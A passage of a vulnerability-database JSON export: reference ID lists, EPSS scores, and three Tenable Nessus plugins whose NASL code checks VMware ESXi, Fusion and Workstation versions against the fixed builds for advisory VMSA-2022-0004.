"THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9", "VMSA-2022-0004"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37889"]}]}, "epss": [{"cve": "CVE-2021-22040", "epss": "0.000430000", "percentile": "0.077550000", "modified": "2023-03-18"}, {"cve": "CVE-2021-22041", "epss": "0.000430000", "percentile": "0.077550000", "modified": "2023-03-18"}, {"cve": "CVE-2021-22042", "epss": "0.000420000", "percentile": "0.056370000", "modified": "2023-03-18"}, {"cve": "CVE-2021-22043", "epss": "0.000840000", "percentile": "0.339750000", "modified": "2023-03-18"}, {"cve": "CVE-2021-22050", "epss": "0.000770000", "percentile": "0.313320000", "modified": "2023-03-18"}, {"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-18"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1659988328, "score": 1698844884, "epss": 1679178262}, "_internal": {"score_hash": "fdc3afa65e0ce74c77d2662dffefefd1"}}

{"nessus": [{"lastseen": "2023-07-26T16:21:59", "description": "The remote VMware ESXi host is version 6.5, 6.7 or 7.0 and is affected by multiple vulnerabilities, including the following:\n\n - VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. (CVE-2021-22040)\n\n - VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. (CVE-2021-22041)\n\n - VMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. A malicious actor with privileges within the VMX process only, may be able to access settingsd service running as a high privileged user. (CVE-2021-22042)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-01T00:00:00", "type": "nessus", "title": "ESXi 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2022-0004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043", "CVE-2021-22050"], "modified": "2022-05-06T00:00:00", "cpe": ["cpe:/o:vmware:esxi"], "id": "VMWARE_ESXI_VMSA-2022-0004.NASL", "href": "https://www.tenable.com/plugins/nessus/158494", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158494);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2021-22040\",\n \"CVE-2021-22041\",\n \"CVE-2021-22042\",\n \"CVE-2021-22043\",\n \"CVE-2021-22050\"\n );\n script_xref(name:\"IAVA\", value:\"2022-A-0089\");\n\n script_name(english:\"ESXi 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2022-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi host is missing a security patch and is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is version 6.5, 6.7 or 7.0 and is affected by multiple vulnerabilities, including the\nfollowing:\n\n - VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A\n malicious actor with local administrative privileges on a virtual machine may exploit this issue to\n execute code as the virtual machine's VMX process running on the host. (CVE-2021-22040)\n\n - VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. A\n malicious actor with local administrative privileges on a virtual machine may exploit this issue to\n execute code as the virtual machine's VMX process running on the host. (CVE-2021-22041)\n\n - VMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd\n authorization tickets. A malicious actor with privileges within the VMX process only, may be able to\n access settingsd service running as a high privileged user. (CVE-2021-22042)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22043\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22042\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\", \"Host/VMware/vsphere\");\n\n exit(0);\n}\n\nvar fixes = make_array(\n '6.5', 19092475, # ESXi650-202202401-SG\n '6.7', 18828794, # ESXi670-202111101-SG\n '7.0', 19193900 # ESXi70U3c-19193900\n);\n\n# Note there are three updates for 7.0 with the update for 7.0 U3 being the lowest build number\n# 7.0 U1 - 1e - ESXi70U1e-19324898\n# 7.0 U2 - 2e - ESXi70U2e-19290878\n# 7.0 U3 - 3c - ESXi70U3c-19193900\n\n# Also note that we are not checking for any workarounds. While there are workarounds for CVE-2021-22041, other CVEs do\n# not have workarounds\n\nvar rel = get_kb_item_or_exit('Host/VMware/release');\nif ('ESXi' >!< rel) audit(AUDIT_OS_NOT, 'ESXi');\n\nvar ver = get_kb_item_or_exit('Host/VMware/version');\nvar port = get_kb_item_or_exit('Host/VMware/vsphere');\n\nvar match = pregmatch(pattern:\"^ESXi? ([0-9]+\\.[0-9]+).*$\", string:ver);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, 'VMware ESXi', '6.5 / 6.7 / 7.0');\nver = match[1];\n\nif (ver !~ \"^(7\\.0|6\\.(5|7))$\") audit(AUDIT_OS_NOT, 'ESXi 6.5 / 6.7 / 7.0');\n\nvar fixed_build = fixes[ver];\n\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nmatch = pregmatch(pattern:\"^VMware ESXi.*build-([0-9]+)$\", string:rel);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, 'VMware ESXi', '6.5 / 6.7 / 7.0');\n\nvar build = int(match[1]);\n\nif (build >= fixed_build) audit(AUDIT_INST_VER_NOT_VULN, 'VMware ESXi', ver + ' build ' + build);\n\n# Extra details for 7.0\nif (ver == '7.0')\n fixed_build = '7.0U1 19324898 / 7.0U2 19290878 / 7.0U3 19193900';\n\nvar report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:41:35", "description": "The version of VMware Fusion installed on the remote macOS or Mac OS X host is 12.0.x prior to 12.2.1. It is, therefore, affected by multiple vulnerabilities.\n\n - VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. (CVE-2021-22040)\n\n - VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. (CVE-2021-22041)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-18T00:00:00", "type": "nessus", "title": "VMware Fusion 12.0.x < 12.2.1 Multiple Vulnerabilities (VMSA-2022-0004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/a:vmware:fusion"], "id": "MACOSX_FUSION_VMSA_2022_0004.NASL", "href": "https://www.tenable.com/plugins/nessus/158147", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158147);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2021-22040\", \"CVE-2021-22041\");\n script_xref(name:\"VMSA\", value:\"2022-0004\");\n script_xref(name:\"IAVA\", value:\"2022-A-0089\");\n\n script_name(english:\"VMware Fusion 12.0.x < 12.2.1 Multiple Vulnerabilities (VMSA-2022-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote macOS or Mac OS X host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Fusion installed on the remote macOS or Mac OS X host is 12.0.x prior to 12.2.1. It is,\ntherefore, affected by multiple vulnerabilities.\n\n - VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A\n malicious actor with local administrative privileges on a virtual machine may exploit this issue to\n execute code as the virtual machine's VMX process running on the host. (CVE-2021-22040)\n\n - VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. A\n malicious actor with local administrative privileges on a virtual machine may exploit this issue to\n execute code as the virtual machine's VMX process running on the host. (CVE-2021-22041)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/kb/87349\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to VMware Fusion version 12.2.1, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22041\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/18\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:fusion\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_fusion_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"installed_sw/VMware Fusion\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'VMware Fusion');\n\n# TODO report_paranoia was set, please verify if the identified workaround can be checked\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'min_version' : '12.0', 'fixed_version' : '12.2.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:41:35", "description": "The version of VMware Workstation installed on the remote host is 16.0.x prior to 16.2.1. It is, therefore, affected by multiple vulnerabilities:\n\n - VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. (CVE-2021-22040)\n\n - VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. (CVE-2021-22041)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-18T00:00:00", "type": "nessus", "title": "VMware Workstation 16.0.x < 16.2.1 Multiple Vulnerabilities (VMSA-2022-0004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_VMSA_2022_0004.NASL", "href": "https://www.tenable.com/plugins/nessus/158148", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158148);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2021-22040\", \"CVE-2021-22041\");\n script_xref(name:\"VMSA\", value:\"2022-0004\");\n script_xref(name:\"IAVA\", value:\"2022-A-0089\");\n\n script_name(english:\"VMware Workstation 16.0.x < 16.2.1 Multiple Vulnerabilities (VMSA-2022-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization application installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote host is 16.0.x prior to 16.2.1. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A\n malicious actor with local administrative privileges on a virtual machine may exploit this issue to\n execute code as the virtual machine's VMX process running on the host. (CVE-2021-22040)\n\n - VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. A\n malicious actor with local administrative privileges on a virtual machine may exploit this issue to\n execute code as the virtual machine's VMX process running on the host. (CVE-2021-22041)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/87349\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to VMware Workstation version 16.2.1, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22041\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/18\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\", \"vmware_workstation_linux_installed.nbin\");\n script_require_keys(\"Host/VMware Workstation/Version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nif (get_kb_item('SMB/Registry/Enumerated')) win_local = TRUE;\n\nvar app_info = vcf::get_app_info(app:'VMware Workstation', win_local:win_local);\n\n# Cannot check if USB controllers are being used\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'min_version' : '16.0', 'fixed_version' : '16.2.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, 